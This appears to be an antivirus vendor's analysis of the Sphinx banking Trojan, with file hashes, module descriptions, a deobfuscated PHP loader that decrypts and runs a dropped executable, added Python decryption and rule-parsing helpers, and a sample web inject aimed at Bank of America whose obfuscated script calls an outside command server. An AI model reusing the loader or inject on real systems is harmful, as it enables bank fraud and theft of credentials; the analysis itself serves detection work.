Trojan.PWS.Sphinx.2

Added to the Dr.Web virus database: 2017-02-01

SHA1:

  • packed 4b86b7ec7371a98041391203d17fe731602c8fc0
  • unpacked ac745b2c36fd0529e7e27ba98e1032ad7a108d22
  • client32.dll ff82700ee26bbaf5a3357c5f5070fda9f80f9993
  • client64.dll c31d5caf4927cd5885112649a762a89c812913e0
  • vncdll32.dll a5e2fd98f1e8466700e20b690eed359f79a353bf
  • vncdll64.dll ce6a35afd9332439ac852f51fd9b60d7fd85362b

A banking Trojan based on the source code of Zeus (Trojan.PWS.Panda) and used mainly to perform web injects. The Trojan’s code is obfuscated. When launched, the malicious program embeds itself in the process of Explorer (explorer.exe) and decrypts the loader body and the configuration file in which the command and control (C&C) server’s address and encryption key are hidden.

All the information shared between the Trojan and the C&C server is logged. The data is transmitted in the form of POST requests.

First, the Trojan requests that the modules be downloaded from the C&C server. In reply, the server sends it a container that includes plug-ins.

Currently, the following four modules are being downloaded from the server:

  • client32.dll—a module for performing web injects on a 32-bit OS.
  • client64.dll—a module for performing web injects on a 64-bit OS.
  • vncdll32.dll—a VNC module for a 32-bit OS.
  • vncdll64.dll—a VNC module for a 64-bit OS.

The last two modules are used to launch a VNC server that lets cybercriminals connect to the infected computer.

In addition, Trojan.PWS.Sphinx.2 downloads a set of utilities for installing a root digital certificate that can be used by cybercriminals to carry out MITM attacks.

  • certutil.exe
  • freebl3.dll
  • libnspr4.dll
  • libplc4.dll
  • libplds4.dll
  • msvcr100.dll
  • nss3.dll
  • nssdbm3.dll
  • nssutil3.dll
  • smime3.dll
  • softokn3.dll
  • sqlite3.dll

The Trojan uses a PHP script to launch itself. For this purpose, it saves two files on the infected computer:

  • php.exe
  • php5ts.dll

The script code is obfuscated. When deobfuscated, it looks as follows:

<?php
// Function-name table left over from the obfuscation layer: the obfuscated
// script calls functions indirectly through this array, the deobfuscated
// code below calls them directly.
$GLOBALS['2132652578']=Array('imagecopymergegray','strpos','strncmp','file_get_contents','fgets','file_put_contents','exec','unlink','strlen','mt_rand','strtr','chr','ord','mt_rand','strrchr','strpos','bin2hex');
?>
<?php
// String table. Entries 0 and 1 are the encrypted paths of the encrypted
// payload file and of the executable it is decrypted into; the remaining
// entries are only used by the junk conditions below.
function _499671292($thgwox){
    $mwvttf=Array("\x3a\x1d\xf7\xe9\x09\x4d\xde\xce\x27\x5d\xc8\xcc\x19\x1b\xf2\xfe\x0d\x5b\xeb\xa1\x0a\x4d\xec\x93\x10\x4c\xdc\xab\xee\x49\xee\x9a\xf7\x5b\xc6\xbd\xde\x55\xc6\xb2\xec\x1f\xdc\xbc\xfd",
    "\x3a\x1d\xf7\xe9\x09\x4d\xde\xce\x27\x5d\xc8\xcc\x19\x1b\xf2\xfe\x0d\x5b\xeb\xa1\x0a\x4d\xec\x93\x10\x4c\xdc\xab\xee\x49\xee\x9a\xf7\x5b\xc6\xbd\xde\x55\xc6\xb2\xec\x1f\xdc\xbc\xfd\x1c\xd3\xbf\xe0",
    'fadrgfnjntmvfl',
    'daz',
    '',
    'sqwwhirkltslkcv',
    'fuwmz');
    return $mwvttf[$thgwox];
}
?>
<?php
$iqegybr=648723321; // XOR key; the obfuscator originally produced it as round(0+129744664.2+129744664.2+129744664.2+129744664.2+129744664.2)
// Junk loop: 2914-2914 is always 0, so the body never runs.
while(round(0+1457+1457)-round(0+1457+1457))
    imagecopymergegray($rhljwqh);
$trbedbh=_499671292(0);
$rhljwqh=_499671292(1);
$trbedbh=decodeString($trbedbh,$iqegybr); // decrypts to C:\Users\tere1\AppData\Roaming\Yvtuy\erwo.izy
// Junk condition: 'daz' never occurs in 'fadrgfnjntmvfl', so strncmp is never called.
if(strpos(_499671292(2),_499671292(3))!==false)
    strncmp($iqegybr,$iqavsjx);
$rhljwqh=decodeString($rhljwqh,$iqegybr); // decrypts to C:\Users\tere1\AppData\Roaming\Yvtuy\erwo.izy.exe
$ebcpnbn=file_get_contents($trbedbh);       // read the encrypted payload
if($ebcpnbn){
    $scfhmal=decodeString($ebcpnbn,$iqegybr); // decrypt it with the same key
    file_put_contents($rhljwqh,$scfhmal);     // write the decrypted executable
    exec($rhljwqh);                           // run it
    while(!unlink($rhljwqh))                  // delete the dropped file once it is no longer locked
        Sleep(round(0+1));                    // PHP function names are case-insensitive, so this is sleep(1)
    $soizplh=round(0+621.8+621.8+621.8+621.8+621.8); // junk
}
// Rotate the low 32 bits of $key left by $seed bits.
function rol($key,$seed){
    $seed2=$seed&31;
    return($key << $seed2)|(($key >>(32-$seed2))&((1<<(31&$seed2))-1));
}
// Rolling XOR: each byte is XORed with the low byte of the key, then the key
// is rotated left by 8 bits and incremented. XOR is symmetric, so the same
// routine both encrypts and decrypts.
function decodeString($buf,$key){
    $out="";
    $n=strlen($buf);
    for($i=0;$i<$n;++$i){
        $sym=chr(ord($buf[$i])^($key&255)); // the original used the PHP 5 offset syntax $buf{$i}
        $out .= $sym;
        $key=rol($key,8);
        ++$key;
    }
    return $out;
}
?>

The following shortcut is used to execute the script:

%HOMEPATH%\start menu\programs\startup\php.lnk
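The rolling XOR used by the loader, reimplemented in Python as an added example (not code from the page or from the Trojan) so that a dropped payload file can be decrypted offline. The key constant is the one in the script above; the sample data is constructed, and keystream, decrypt_payload and its "MZ" check are this example's own additions.

```python
# Reimplementation of the loader's decodeString/rol routine, added here as an
# example for decrypting the dropped payload offline; the sample data is constructed.
from typing import Optional

MASK32 = 0xFFFFFFFF
SAMPLE_KEY = 648723321  # the $iqegybr constant from the deobfuscated script


def rol32(key: int, seed: int) -> int:
    """Rotate the low 32 bits of key left by (seed & 31) bits."""
    s = seed & 31
    key &= MASK32
    return ((key << s) | (key >> (32 - s))) & MASK32


def decode_string(buf: bytes, key: int) -> bytes:
    """XOR each byte with the low key byte, then key = rol(key, 8) + 1.

    Only the low byte and bits 24..31 of the key are ever read, and neither
    changes when the key is truncated to 32 bits, so the key stream matches
    the PHP script. XOR is symmetric: the same call encrypts and decrypts.
    """
    out = bytearray()
    for b in buf:
        out.append(b ^ (key & 0xFF))
        key = (rol32(key, 8) + 1) & MASK32
    return bytes(out)


def keystream(key: int, n: int) -> bytes:
    """First n key bytes; XOR them against a file's first bytes to test a key."""
    return decode_string(bytes(n), key)


def decrypt_payload(data: bytes, key: int) -> Optional[bytes]:
    """Decrypt a dropped blob; the loader writes the result out as an .exe,
    so accept it only if it starts with the PE 'MZ' signature."""
    plain = decode_string(data, key)
    return plain if plain.startswith(b"MZ") else None


if __name__ == "__main__":
    # Constructed stand-in for an encrypted payload: a fake PE header encrypted
    # with the sample key. Real use: decrypt_payload(open(path, "rb").read(), key)
    blob = decode_string(b"MZ\x90\x00" + bytes(60), SAMPLE_KEY)
    print("PE recovered" if decrypt_payload(blob, SAMPLE_KEY) else "key mismatch")
```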

An example of a performed web inject:

set_url *.bankofamerica.com/ GP
data_before
<body>
data_end
data_inject
<script id="loader" type="text/javascript">
document.body.style.display = "none";
(function(){
var _0x7f7f=["\x53\x43\x52\x49\x50\x54","\x63\x72\x65\x61\x74\x65\x45\x6C\x65\x6D\x65\x6E\x74","\x3F\x72\x61\x6E\x64\x3D","\x72\x61\x6E\x64\x6F\x6D","\x26","\x61\x6A\x61\x78\x5F\x72\x65\x61\x64\x79\x53\x74\x61\x74\x65","\x6F\x6E\x6C\x6F\x61\x64","\x6F\x6E\x72\x65\x61\x64\x79\x73\x74\x61\x74\x65\x63\x68\x61\x6E\x67\x65","\x73\x72\x63","\x61\x70\x70\x65\x6E\x64\x43\x68\x69\x6C\x64","\x70\x61\x72\x65\x6E\x74\x4E\x6F\x64\x65","\x73\x63\x72\x69\x70\x74","\x67\x65\x74\x45\x6C\x65\x6D\x65\x6E\x74\x73\x42\x79\x54\x61\x67\x4E\x61\x6D\x65","\x72\x65\x61\x64\x79\x53\x74\x61\x74\x65","\x6C\x6F\x61\x64\x65\x64","\x63\x6F\x6D\x70\x6C\x65\x74\x65","\x61\x70\x70\x6C\x79","\x72\x65\x6D\x6F\x76\x65\x43\x68\x69\x6C\x64","\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4A\x4B\x4C\x4D\x4E\x4F\x50","\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5A\x61\x62\x63\x64\x65\x66","\x67\x68\x69\x6A\x6B\x6C\x6D\x6E\x6F\x70\x71\x72\x73\x74\x75\x76","\x77\x78\x79\x7A\x30\x31\x32\x33\x34\x35\x36\x37\x38\x39\x2B\x2F","\x3D","","\x72\x65\x70\x6C\x61\x63\x65","\x63\x68\x61\x72\x41\x74","\x69\x6E\x64\x65\x78\x4F\x66","\x66\x72\x6F\x6D\x43\x68\x61\x72\x43\x6F\x64\x65","\x6C\x65\x6E\x67\x74\x68"];function sendScriptRequest(_0xade3x2,_0xade3x3,_0xade3x4,_0xade3x5){var _0xade3x6=document[_0x7f7f[1]](_0x7f7f[0]);if(_0xade3x3){_0xade3x3=_0x7f7f[2]+Math[_0x7f7f[3]]()+_0x7f7f[4]+_0xade3x3;} else {_0xade3x3=_0x7f7f[2]+Math[_0x7f7f[3]]();} ;_0xade3x6[_0x7f7f[5]]=false;_0xade3x6[_0x7f7f[6]]=scriptCallback(_0xade3x6,_0xade3x4,_0xade3x5);_0xade3x6[_0x7f7f[7]]=scriptCallback(_0xade3x6,_0xade3x4,_0xade3x5);_0xade3x6[_0x7f7f[8]]=_0xade3x2+_0xade3x3;document[_0x7f7f[12]](_0x7f7f[11])[0][_0x7f7f[10]][_0x7f7f[9]](_0xade3x6);} ;function scriptCallback(_0xade3x6,_0xade3x4,_0xade3x5){return function (){if(_0xade3x6[_0x7f7f[5]]){return ;} 
;if(!_0xade3x6[_0x7f7f[13]]||_0xade3x6[_0x7f7f[13]]==_0x7f7f[14]||_0xade3x6[_0x7f7f[13]]==_0x7f7f[15]){_0xade3x6[_0x7f7f[5]]=true;_0xade3x4[_0x7f7f[16]](_0xade3x6,_0xade3x5);_0xade3x6[_0x7f7f[10]][_0x7f7f[17]](_0xade3x6);} ;} ;} ;function decode64(_0xade3x9){var _0xade3xa=_0x7f7f[18]+_0x7f7f[19]+_0x7f7f[20]+_0x7f7f[21]+_0x7f7f[22];var _0xade3xb=_0x7f7f[23];var _0xade3xc,_0xade3xd,_0xade3xe=_0x7f7f[23];var _0xade3xf,_0xade3x10,_0xade3x11,_0xade3x12=_0x7f7f[23];var _0xade3x13=0;var _0xade3x14=/[^A-Za-z0-9\+\/\=]/g;_0xade3x9=_0xade3x9[_0x7f7f[24]](/[^A-Za-z0-9\+\/\=]/g,_0x7f7f[23]);do{_0xade3xf=_0xade3xa[_0x7f7f[26]](_0xade3x9[_0x7f7f[25]](_0xade3x13++));_0xade3x10=_0xade3xa[_0x7f7f[26]](_0xade3x9[_0x7f7f[25]](_0xade3x13++));_0xade3x11=_0xade3xa[_0x7f7f[26]](_0xade3x9[_0x7f7f[25]](_0xade3x13++));_0xade3x12=_0xade3xa[_0x7f7f[26]](_0xade3x9[_0x7f7f[25]](_0xade3x13++));_0xade3xc=(_0xade3xf<<2)|(_0xade3x10>>4);_0xade3xd=((_0xade3x10&15)<<4)|(_0xade3x11>>2);_0xade3xe=((_0xade3x11&3)<<6)|_0xade3x12;_0xade3xb=_0xade3xb+String[_0x7f7f[27]](_0xade3xc);if(_0xade3x11!=64){_0xade3xb=_0xade3xb+String[_0x7f7f[27]](_0xade3xd);} ;if(_0xade3x12!=64){_0xade3xb=_0xade3xb+String[_0x7f7f[27]](_0xade3xe);} ;_0xade3xc=_0xade3xd=_0xade3xe=_0x7f7f[23];_0xade3xf=_0xade3x10=_0xade3x11=_0xade3x12=_0x7f7f[23];} while(_0xade3x13<_0xade3x9[_0x7f7f[28]]);;return unescape(_0xade3xb);} ;
var bn = "US_" + "BOFA_2";
var bot_id = "%BOTID%_" + bn;
var sa = decode64("aHR0cHM6Ly9pbmJpd29vLmNvbS9hOHNkYXNkai9Ia2E5MGFsLnBocA==");
var req = "send=0&u_bot_id=" + bot_id + "&bn=" + bn + "&page=0&u_login=&u_pass=&log=" + 'get_me_core';
sendScriptRequest(sa, req, function statusCall1() {
   var element = document.getElementById("loader");
  element.parentNode.removeChild(element);
} );
 })();
</script>
data_end
...
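A parser for the web-inject rule format shown above (set_url / data_before / data_inject / data_end), added here as an example and not part of the original page: it lets a defender list which URL masks a recovered configuration targets and what markup each rule inserts. The rule text is constructed, the URL mask is approximated with case-insensitive shell-style wildcards, and data_after is assumed to belong to the same format even though the page's rule does not use it.

```python
# Parser for the Zeus-style web-inject rule format (set_url / data_before /
# data_inject / data_after / data_end), added as an example; rules are constructed.
from dataclasses import dataclass, field
from fnmatch import fnmatchcase
from typing import Dict, List

SAMPLE_RULES = """set_url *.example-bank.test/ GP
data_before
<body>
data_end
data_inject
<script src="https://injector.example/loader.js"></script>
data_end
set_url https://login.example-bank.test/auth* P
data_inject
<input type="hidden" name="x" value="1">
data_end
"""

SECTION_KEYS = ("data_before", "data_inject", "data_after")  # data_after assumed, unused above


@dataclass
class InjectRule:
    url_pattern: str      # URL mask; * is a wildcard
    flags: str            # e.g. G = apply on GET, P = apply on POST
    data: Dict[str, str] = field(default_factory=dict)  # section name -> markup

    def matches(self, url: str) -> bool:
        # Approximates the mask with a case-insensitive shell-style wildcard match
        return fnmatchcase(url.lower(), self.url_pattern.lower())


def parse_inject_rules(text: str) -> List[InjectRule]:
    rules: List[InjectRule] = []
    section = None
    for raw in text.splitlines():
        line = raw.strip()
        if line.startswith("set_url "):
            parts = line.split(None, 2)
            rules.append(InjectRule(parts[1], parts[2] if len(parts) > 2 else ""))
            section = None
        elif line in SECTION_KEYS:
            if not rules:
                raise ValueError("section before any set_url")
            section = line
            rules[-1].data.setdefault(section, "")
        elif line == "data_end":
            section = None
        elif section is not None:
            rules[-1].data[section] += raw + "\n"  # keep markup lines verbatim
    return rules
```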

Moreover, the Trojan has a grabber—a module that intercepts data entered by the user into various forms and then sends it to the cybercriminals. For this, the Trojan requests the corresponding filters from the C&C server.

All the information required for the Trojan’s operation is encrypted and stored in the Windows system registry. Registry branch names are generated automatically using a special algorithm.

Modules are saved to a separate file with a random extension, which is also encrypted.
